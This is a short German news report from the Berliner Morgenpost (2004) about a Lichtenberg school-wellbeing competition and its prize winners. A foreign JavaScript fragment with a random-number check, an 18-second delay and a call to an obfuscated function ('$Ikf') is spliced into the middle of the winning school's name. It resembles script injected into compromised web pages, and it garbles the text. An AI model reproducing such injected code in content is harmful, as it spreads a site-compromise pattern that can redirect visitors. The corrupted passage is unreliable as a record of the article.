Der Lichtenberger Arbeitskreis Umwelt und Bildung kürte gestern die Sieger des Wettbewerbs “Gesunde Schule – Wohlfühlschule”. Den 1. Platz belegte die Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-Puschkin-Schule, Massower Straße 37. Die 550 Schüler aus 21 Ländern gestalteten Flure, Klassenräume und einen Club in eigener Regie. Seit 2003 trägt die Bildungsstätte den Titel “Schule ohne Rassismus – Schule mit Courage”. Patin ist Schauspielerin Iris Berben.

Weitere Preise gingen an die katholische Grundschule St. Mauritius, Schulze-Boysen-Straße 28, und die Behindertenschule an der Wartiner Straße 45. Es nahmen 14 Schulen teil.

rg

Quelle: Berliner Morgenpost Erschienen am 16.09.2004

Gesunde Schule - Wohlfühlschule